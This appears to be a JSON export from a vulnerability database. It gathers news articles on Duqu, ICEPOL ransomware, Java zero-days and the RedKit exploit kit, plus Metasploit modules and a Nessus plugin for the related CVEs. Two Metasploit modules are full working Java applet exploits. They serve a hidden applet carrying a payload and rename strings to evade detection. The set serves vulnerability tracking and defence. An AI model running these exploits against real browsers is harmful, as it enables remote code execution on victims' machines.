"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3402"], "modified": "2012-03-19T19:59:41", "id": "THN:3E923BF60240465681EDB5EF458156F0", "href": "https://thehackernews.com/2011/11/duqu-malware-was-created-to-spy-on.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T09:17:42", "description": "[![ICEPOL Reveton Ransomware Trojan](https://3.bp.blogspot.com/-goylQ_crASs/UuoeOzUewsI/AAAAAAAAASk/xLNzzDSmUHQ/s728/ICEPOL+Reveton+Ransomware+Trojan.jpg)](<https://3.bp.blogspot.com/-goylQ_crASs/UuoeOzUewsI/AAAAAAAAASk/xLNzzDSmUHQ/s1600/ICEPOL+Reveton+Ransomware+Trojan.jpg>)\n\nAfter Financial and Banking Malwares, Ransomware has become the first choice of money motivated cybercriminals.\n\n \n\n\nA new Ransomware Trojan known as **ICEPOL** has been one of those widespread malware which has been successfully installed approximately 267,786 times worldwide and 42,400 in the USA alone over a five month period, analyzed by the security firm [_BitDefender_](<http://www.presseportal.de/pm/52715/2651614/gemeinsame-aktion-mit-der-rumaenischen-polizei-bitdefender-hat-icepol-trojaner-untersucht>).\n\n \n\n\nThe** **ICEPOL Trojan** **categorized as Ransomware that locks your PC and demand for a ransom amount to unlock it. The Malware was using a previously known vulnerability in Java software i.e. [_CVE-2013-0422_](<http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html>) to infect the systems.\n\n \n\n\nThe malware threatened the user with accusations of illegal piracy or '_porn-related activity_' and requires money for exemption from punishment that pretends to be from the 'police'.\n\n \n\n\n\u201c_The ICEPOL Trojan extorted victims who downloaded it by sending them a message in any one of 25 languages purporting to be from police accusing them of downloading copyrighted material or illegal porn_,\u201d said Catalin Cosoi, Chief Security Strategist from Bitdefender.\n\n \n\n\nThe [malware](<https://thehackernews.com/search/label/Malware>) includes one more money making scheme, i.e. Designed to redirect the victims to the website via _pay-per-click_ scam under the traffic exchange mechanism. The police estimated that more than $32,000 was stolen from the U.S. victims over the five-month period.\n\n \n\n\nThe Romanian police in cooperation with the Internet security firm Bitdefender found dozens of C&C servers and successfully seized one of the major C&C servers, which was the part of large distribution of ICEPOL Trojans, located in the Romanian capital Bucharest.\n\n \n\n\n\u201c_The results of the investigation of ICEPOL Trojan based on cooperation with various law enforcement agencies and third party vendors. Despite the complex investigations, we have so far achieved very good results and we will continue to fight cybercrime_\", says the head of the agency against cyber crime, the Romanian National Police.\n\n \n\n\nThis is not the first time when a ransomware tricked the victims successfully, also last year [cryptolocker](<https://thehackernews.com/search/label/CryptoLocker>) of the same category hits millions of computer users. So, users are advised to keep their systems software and anti-virus solutions up-to-date and most importantly patch your Java distribution immediately to _Update 51_.\n\n \n\n\nStay Safe! Stay Tuned!\n", "cvss3": {}, "published": "2014-01-29T22:48:00", "type": "thn", "title": "ICEPOL Ransomware Servers seized by Romanian Police that infected 260,000 Computers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-0422"], "modified": "2014-01-31T06:55:09", "id": "THN:4EAA4FEF21F8E68A90003CC58D6639E2", "href": "https://thehackernews.com/2014/01/icepol-ransomware-servers-seized-by.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:26", "description": "[![](http://2.bp.blogspot.com/-hmHfgVixQNI/UPbcy1J22jI/AAAAAAAAR4M/oWTQ6wJAx4E/s640/Oracle+Patches+Java+Zero+Day+Vulnerability.jpg)](<http://2.bp.blogspot.com/-hmHfgVixQNI/UPbcy1J22jI/AAAAAAAAR4M/oWTQ6wJAx4E/s1600/Oracle+Patches+Java+Zero+Day+Vulnerability.jpg>)\n\nOracle delivered an unusual emergency patch to Java's critical Zero Day vulnerability on Sunday to fix a malicious bug that allowed hackers access to users web browsers. Exploits for the [previously undisclosed flaw were](<http://thehackernews.com/2013/01/exploit-packs-updated-with-new-java.html>) being hosted in a number of [exploit kits](<http://thehackernews.com/2012/09/blackhole-exploit-kit-20-released-with.html>) and attacks have already been seen in the wild dropping ransomware and assorted other malware.\n\n \n\n\nSecurity Alert [CVE-2013-0422](<http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html>) include two [vulnerabilities](<http://thehackernews.com/2012/12/hunting-vulnerabilities-in-scada.html>) that are remotely executable. Oracle confirmed that the flaws were only present in Java 7 versions and did not impact Java on servers, Java desktop applications, or embedded Java.\n\n \n \n\n\nJava is used in 3 billion machines, about 2 billion of which are desktop or laptop computers. Similarly, Back in August last year, Oracle issued an urgent fix to seal a dangerous security flaw within its Java software that\u2019s left thousands of computers wide open to malicious attacks from hackers.\n\n \n\n\n**_Lamar Bailey_**, director of security research and development for [nCircle](<https://www.ncircle.com/>) said, \u201c_We\u2019re just two weeks into 2013 and already we\u2019ve seen a surge of critical vulnerabilities and emergency patches. Oracle just added 86 new fixes to overloaded IT teams already struggling to keep up with emergency patches for Java, Internet Explorer and Ruby on Rails._ \n_ \n_ _No matter how far behind IT teams are, they can\u2019t afford to ignore this massive Oracle patch. Oracle Mobile Server has two CVEs that have a CVSS score of ten, that\u2019s as bad as it gets. There are also two MySQL vulnerabilities that can be exploited remotely. All of these should be patched as soon as possible_.\u201d \n \nJanuary Patch include 86 security updates across all major product lines including [Oracle Database](<http://thehackernews.com/2012/05/oracle-database-new-zero-day-exploit.html>) and MySQL Server. Patches for a number of Oracle applications were released Tuesday, including nine for Oracle E-Business Suite (7 of which are remotely exploitable), 12 in Oracle PeopleSoft (7 remotely exploitable), 10 in Oracle Siebel CRM (5 remotely exploitable), and one each in Oracle Supply Chain Products Suite and Oracle JD Edwards Products.\n", "cvss3": {}, "published": "2013-01-16T06:01:00", "type": "thn", "title": "Oracle Patches Java Zero Day Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-0422"], "modified": "2013-01-16T17:01:53", "id": "THN:B322DFBE39D6B1984ECCA4237D6EB6EB", "href": "http://thehackernews.com/2013/01/oracle-patches-java-zero-day.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-05-11T00:20:13", "description": "[![The Hacker News](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/images/-hmHfgVixQNI/UPbcy1J22jI/AAAAAAAAR4M/oWTQ6wJAx4E/s728-e365/Oracle+Patches+Java+Zero+Day+Vulnerability.jpg>)\n\nOracle delivered an unusual emergency patch to Java's critical Zero Day vulnerability on Sunday to fix a malicious bug that allowed hackers access to users web browsers. Exploits for the [previously undisclosed flaw were](<https://thehackernews.com/2013/01/exploit-packs-updated-with-new-java.html>) being hosted in a number of [exploit kits](<https://thehackernews.com/2012/09/blackhole-exploit-kit-20-released-with.html>) and attacks have already been seen in the wild dropping ransomware and assorted other malware.\n\n \n\n\nSecurity Alert [CVE-2013-0422](<https://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html>) include two [vulnerabilities](<https://thehackernews.com/2012/12/hunting-vulnerabilities-in-scada.html>) that are remotely executable. Oracle confirmed that the flaws were only present in Java 7 versions and did not impact Java on servers, Java desktop applications, or embedded Java.\n\n \n \n\n\nJava is used in 3 billion machines, about 2 billion of which are desktop or laptop computers. Similarly, Back in August last year, Oracle issued an urgent fix to seal a dangerous security flaw within its Java software that's left thousands of computers wide open to malicious attacks from hackers.\n\n \n\n\n**_Lamar Bailey_**, director of security research and development for [nCircle](<https://www.ncircle.com/>) said, \"_We're just two weeks into 2013 and already we've seen a surge of critical vulnerabilities and emergency patches. Oracle just added 86 new fixes to overloaded IT teams already struggling to keep up with emergency patches for Java, Internet Explorer and Ruby on Rails._ \n_ \n_ _No matter how far behind IT teams are, they can't afford to ignore this massive Oracle patch. Oracle Mobile Server has two CVEs that have a CVSS score of ten, that's as bad as it gets. There are also two MySQL vulnerabilities that can be exploited remotely. All of these should be patched as soon as possible_.\" \n \nJanuary Patch include 86 security updates across all major product lines including [Oracle Database](<https://thehackernews.com/2012/05/oracle-database-new-zero-day-exploit.html>) and MySQL Server. Patches for a number of Oracle applications were released Tuesday, including nine for Oracle E-Business Suite (7 of which are remotely exploitable), 12 in Oracle PeopleSoft (7 remotely exploitable), 10 in Oracle Siebel CRM (5 remotely exploitable), and one each in Oracle Supply Chain Products Suite and Oracle JD Edwards Products.\n", "cvss3": {}, "published": "2013-01-16T17:01:00", "type": "thn", "title": "Oracle Patches Java Zero Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0422"], "modified": "2013-01-16T17:01:53", "id": "THN:89520BFD362B62FC3AC65D16DFCFDA44", "href": "https://thehackernews.com/2013/01/oracle-patches-java-zero-day.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-11T00:22:22", "description": "**RedKit Exploit Kit** : New web malware exploitation pack \n\n\n[![The Hacker News](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/images/-qhaOFk4KkyY/T6WMpVqp5QI/AAAAAAAAGCw/itUPRLy0FxE/s728-e365/RedKit+Exploit+Kit+New+web+malware+exploitation+pack.png>)\n\n \n\n\nTrustwave researchers have spotted a new exploit kit called \"**RedKit Exploit Kit**\" that being used in the wild is aiming to enter a market that is practically monopolized by the widely famous BlackHole and Phoenix exploit kits.\n\n \n\n\nIn actual, The new kit has no official name, so the researchers dubbed it '**Redkit**' due to the red bordering used in the application's panel.\n\n \n\n\n\"_**Logging to the admin panel presents you with options which are typically used by other exploit kits. The panel allows you to check the statistics for incoming traffic, upload a payload executable and even scan this payload with no less than 37 different AV's**_,\" Trustwave [reports](<https://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html>).\n\n \n\n\nTo deliver the malware, RedKit exploits two popular bugs:\n\n**1.)** The Adobe Acrobat and Reader LibTIFF vulnerability ([CVE-2010-0188](<https://vulners.com/cve/CVE-2010-0188>)).\n\n**2.)** The Java AtomicReferenceArray vulnerability ([CVE-2012-0507](<https://vulners.com/cve/CVE-2012-0507>)), lately used by the criminals behind the massive Flashback infection.\n\n[![The Hacker News](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/images/-A8BHujRUats/T6WN-4ajjFI/AAAAAAAAGC4/gZveQvkr1V0/s728-e365/av.png>)\n\n \n\n\n\"**_As each malicious URL gets blocked by most security firms after 24 to 48 hours, the Redkit's author have provide a new API which will produce a fresh URL every hour, so that customer of this exploit kit can now set up an automated process for updating the traffic sources every hour or so to point to the new URL._**\"\n", "cvss3": {}, "published": "2012-05-05T20:31:00", "type": "thn", "title": "RedKit Exploit Kit : New web malware exploitation pack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0188", "CVE-2012-0507"], "modified": "2012-10-08T20:49:26", "id": "THN:66B3577F27CF69B6725ED86CD3853632", "href": "https://thehackernews.com/2012/05/redkit-exploit-kit-new-web-malware.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-06-05T15:51:45", "description": "This module searches for CVE-2011-3402 (Duqu) related registry artifacts.\n", "cvss3": {}, "published": "2011-11-10T21:20:48", "type": "metasploit", "title": "Windows Gather Forensics Duqu Registry Check", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3402"], "modified": "2023-02-08T13:47:34", "id": "MSF:POST-WINDOWS-GATHER-FORENSICS-DUQU_CHECK-", "href": "https://www.rapid7.com/db/modules/post/windows/gather/forensics/duqu_check/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Windows Gather Forensics Duqu Registry Check',\n 'Description' => %q{ This module searches for CVE-2011-3402 (Duqu) related registry artifacts.},\n 'License' => MSF_LICENSE,\n 'Author' => [ 'Marcus J. Carey <mjc[at]threatagent.com>'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ],\n 'References' => [\n [ 'CVE', '2011-3402' ],\n [ 'URL', 'http://r-7.co/w5h7fY' ]\n ]\n )\n )\n end\n\n def run\n # Registry artifacts sourced from Symantec report\n artifacts =\n [\n 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\\"CFID\"',\n 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\CFID',\n 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\JmiNET3',\n 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\JmiNET3\\FILTER'\n ]\n match = 0\n\n print_status(\"Searching registry on #{sysinfo['Computer']} for CVE-2011-3402 exploitation [Duqu] artifacts.\")\n\n begin\n artifacts.each do |artifact|\n (path, query) = parse_path(artifact)\n has_key = registry_enumkeys(path)\n has_val = registry_enumvals(path)\n\n next unless has_key.include?(query) || has_val.include?(query)\n\n print_good(\"#{sysinfo['Computer']}: #{path}\\\\#{query} found in registry.\")\n match += 1\n report_vuln(\n host: session.session_host,\n name: name,\n info: \"Module #{fullname} detected #{path}\\\\#{query} - possible CVE-2011-3402 exploitation [Duqu] artifact.\",\n refs: references,\n exploited_at: Time.now.utc\n )\n end\n rescue StandardError # Probably should do something here...\n end\n\n print_status(\"#{sysinfo['Computer']}: #{match} artifact(s) found in registry.\")\n end\n\n def parse_path(artifact)\n parts = artifact.split('\\\\')\n query = parts[-1]\n parts.pop\n path = parts.join('\\\\')\n return path, query\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/forensics/duqu_check.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-03T07:23:27", "description": "This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in January of 2013. The vulnerability affects Java version 7u10 and earlier.\n", "cvss3": {}, "published": "2013-01-10T19:30:43", "type": "metasploit", "title": "Java Applet JMX Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-0422"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT-MULTI-BROWSER-JAVA_JRE17_JMXBEAN-", "href": "https://www.rapid7.com/db/modules/exploit/multi/browser/java_jre17_jmxbean/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({ :javascript => false })\n\n def initialize( info = {} )\n\n super( update_info( info,\n 'Name' => 'Java Applet JMX Remote Code Execution',\n 'Description' => %q{\n This module abuses the JMX classes from a Java Applet to run arbitrary Java\n code outside of the sandbox as exploited in the wild in January of 2013. The\n vulnerability affects Java version 7u10 and earlier.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery\n 'egypt', # Metasploit module\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-0422' ],\n [ 'OSVDB', '89059' ],\n [ 'US-CERT-VU', '625617' ],\n [ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],\n [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],\n [ 'URL', 'http://pastebin.com/cUG2ayjh' ] #Who authored the code on pastebin? I can't read Russian :-(\n ],\n 'Platform' => %w{ java linux osx win },\n 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\n 'Targets' =>\n [\n [ 'Generic (Java Payload)',\n {\n 'Platform' => ['java'],\n 'Arch' => ARCH_JAVA,\n }\n ],\n [ 'Windows x86 (Native Payload)',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n }\n ],\n [ 'Mac OS X x86 (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X86,\n }\n ],\n [ 'Linux x86 (Native Payload)',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2013-01-10'\n ))\n end\n\n\n def setup\n path = File.join(Msf::Config.data_directory, \"exploits\", \"cve-2013-0422\", \"Exploit.class\")\n @exploit_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n path = File.join(Msf::Config.data_directory, \"exploits\", \"cve-2013-0422\", \"B.class\")\n @loader_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n\n @exploit_class_name = rand_text_alpha(\"Exploit\".length)\n @exploit_class.gsub!(\"Exploit\", @exploit_class_name)\n super\n end\n\n def on_request_uri(cli, request)\n print_status(\"handling request for #{request.uri}\")\n\n case request.uri\n when /\\.jar$/i\n jar = payload.encoded_jar\n jar.add_file(\"#{@exploit_class_name}.class\", @exploit_class)\n jar.add_file(\"B.class\", @loader_class)\n metasploit_str = rand_text_alpha(\"metasploit\".length)\n payload_str = rand_text_alpha(\"payload\".length)\n jar.entries.each { |entry|\n entry.name.gsub!(\"metasploit\", metasploit_str)\n entry.name.gsub!(\"Payload\", payload_str)\n entry.data = entry.data.gsub(\"metasploit\", metasploit_str)\n entry.data = entry.data.gsub(\"Payload\", payload_str)\n }\n jar.build_manifest\n\n send_response(cli, jar, { 'Content-Type' => \"application/octet-stream\" })\n when /\\/$/\n payload = regenerate_payload(cli)\n if not payload\n print_error(\"Failed to generate the payload.\")\n send_not_found(cli)\n return\n end\n send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })\n else\n send_redirect(cli, get_resource() + '/', '')\n end\n\n end\n\n def generate_html\n html = %Q|<html><head><title>Loading, Please Wait...</title></head>|\n html += %Q|<body><center>Loading, Please Wait...</center>|\n html += %Q|<applet archive=\"#{rand_text_alpha(8)}.jar\" code=\"#{@exploit_class_name}.class\" width=\"1\" height=\"1\">|\n html += %Q|</applet></body></html>|\n return html\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/java_jre17_jmxbean.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-04T04:43:15", "description": "This module abuses the Color Management classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41 and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1 systems. This exploit doesn't bypass click-to-play, so the user must accept the java warning in order to run the malicious applet.\n", "cvss3": {}, "published": "2013-03-26T21:30:18", "type": "metasploit", "title": "Java CMM Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-1493"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT-WINDOWS-BROWSER-JAVA_CMM-", "href": "https://www.rapid7.com/db/modules/exploit/windows/browser/java_cmm/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n #include Msf::Exploit::Remote::BrowserAutopwn\n #autopwn_info({ :javascript => false })\n\n def initialize( info = {} )\n\n super( update_info( info,\n 'Name' => 'Java CMM Remote Code Execution',\n 'Description' => %q{\n This module abuses the Color Management classes from a Java Applet to run\n arbitrary Java code outside of the sandbox as exploited in the wild in February\n and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41\n and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1\n systems. This exploit doesn't bypass click-to-play, so the user must accept the java\n warning in order to run the malicious applet.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery and Exploit\n 'juan vazquez' # Metasploit module (just ported the published exploit)\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1493' ],\n [ 'OSVDB', '90737' ],\n [ 'BID', '58238' ],\n [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],\n [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],\n [ 'URL', 'http://pastie.org/pastes/6581034' ]\n ],\n 'Platform' => %w{ java win },\n 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\n 'Targets' =>\n [\n [ 'Generic (Java Payload)',\n {\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA\n }\n ],\n [ 'Windows x86 (Native Payload)',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DisclosureDate' => '2013-03-01'\n ))\n end\n\n\n def setup\n path = File.join(Msf::Config.data_directory, \"exploits\", \"cve-2013-1493\", \"Init.class\")\n @init_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n path = File.join(Msf::Config.data_directory, \"exploits\", \"cve-2013-1493\", \"Leak.class\")\n @leak_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n path = File.join(Msf::Config.data_directory, \"exploits\", \"cve-2013-1493\", \"MyBufferedImage.class\")\n @buffered_image_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n path = File.join(Msf::Config.data_directory, \"exploits\", \"cve-2013-1493\", \"MyColorSpace.class\")\n @color_space_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n\n @init_class_name = rand_text_alpha(\"Init\".length)\n @init_class.gsub!(\"Init\", @init_class_name)\n super\n end\n\n def on_request_uri(cli, request)\n print_status(\"handling request for #{request.uri}\")\n\n case request.uri\n when /\\.jar$/i\n jar = payload.encoded_jar\n jar.add_file(\"#{@init_class_name}.class\", @init_class)\n jar.add_file(\"Leak.class\", @leak_class)\n jar.add_file(\"MyBufferedImage.class\", @buffered_image_class)\n jar.add_file(\"MyColorSpace.class\", @color_space_class)\n metasploit_str = rand_text_alpha(\"metasploit\".length)\n payload_str = rand_text_alpha(\"payload\".length)\n jar.entries.each { |entry|\n entry.name.gsub!(\"metasploit\", metasploit_str)\n entry.name.gsub!(\"Payload\", payload_str)\n entry.data = entry.data.gsub(\"metasploit\", metasploit_str)\n entry.data = entry.data.gsub(\"Payload\", payload_str)\n }\n jar.build_manifest\n\n send_response(cli, jar, { 'Content-Type' => \"application/octet-stream\" })\n when /\\/$/\n payload = regenerate_payload(cli)\n if not payload\n print_error(\"Failed to generate the payload.\")\n send_not_found(cli)\n return\n end\n send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })\n else\n send_redirect(cli, get_resource() + '/', '')\n end\n\n end\n\n def generate_html\n html = %Q|<html><head><title>Loading, Please Wait...</title></head>|\n html += %Q|<body><center>Loading, Please Wait...</center>|\n html += %Q|<applet archive=\"#{rand_text_alpha(8)}.jar\" code=\"#{@init_class_name}.class\" width=\"1\" height=\"1\">|\n html += %Q|</applet></body></html>|\n return html\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/java_cmm.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2023-05-18T14:24:10", "description": "The remote host has an unspecified code execution vulnerability in the Win32k TrueType font parsing engine. Specially crafted TrueType fonts are not properly handled, which could allow arbitrary code execution in kernel mode. A remote attacker could exploit this vulnerability by tricking a user into viewing a specially crafted TrueType font (e.g., via web or email). \n\nThis vulnerability is reportedly exploited by the Duqu malware and is being exploited in the wild.\n\nNote that this plugin has been deprecated on December 13, 2011 with the publication by Microsoft of MS11-087.", "cvss3": {}, "published": "2011-11-04T00:00:00", "type": "nessus", "title": "MS KB2639658: Vulnerability in TrueType Font Parsing Could Allow Elevation of Privilege (DEPRECATED)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3402"], "modified": "2017-08-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_KB2639658.NASL", "href": "https://www.tenable.com/plugins/nessus/56711", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n#\n# (C) Tenable Network Security, Inc.\n#\n\n# @DEPRECATED@\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(56711);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/27 18:38:15\");\n\n script_cve_id(\"CVE-2011-3402\");\n script_bugtraq_id(50462);\n script_xref(name:\"CERT\", value:\"316553\");\n script_xref(name:\"MSKB\", value:\"2639658\");\n\n script_name(english:\"MS KB2639658: Vulnerability in TrueType Font Parsing Could Allow Elevation of Privilege (DEPRECATED)\");\n script_summary(english:\"Checks permissions on t2embed.dll\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Windows host has a code execution vulnerability in its\nfont parsing engine.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host has an unspecified code execution vulnerability in\nthe Win32k TrueType font parsing engine. Specially crafted TrueType\nfonts are not properly handled, which could allow arbitrary code\nexecution in kernel mode. A remote attacker could exploit this\nvulnerability by tricking a user into viewing a specially crafted\nTrueType font (e.g., via web or email). \n\nThis vulnerability is reportedly exploited by the Duqu malware and is\nbeing exploited in the wild.\n\nNote that this plugin has been deprecated on December 13, 2011 with\nthe publication by Microsoft of MS11-087.\"\n );\n script_set_attribute(attribute:\"see_also\",value:\"http://www.crysys.hu/\");\n script_set_attribute(attribute:\"see_also\",value:\"http://www.symantec.com/connect/w32_duqu_precursor_next_stuxnet\");\n # http://www.symantec.com/connect/w32-duqu_status-updates_installer-zero-day-exploit\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?70696c53\");\n script_set_attribute(attribute:\"see_also\",value:\"http://technet.microsoft.com/en-us/security/advisory/2639658\");\n script_set_attribute(attribute:\"see_also\",value:\"http://support.microsoft.com/kb/2639658\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Apply the workaround referenced in Microsoft Security Advisory\n(2639658). This workaround may cause some fonts to display\nimproperly. Refer to the advisory for more information.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:TF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/04\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network 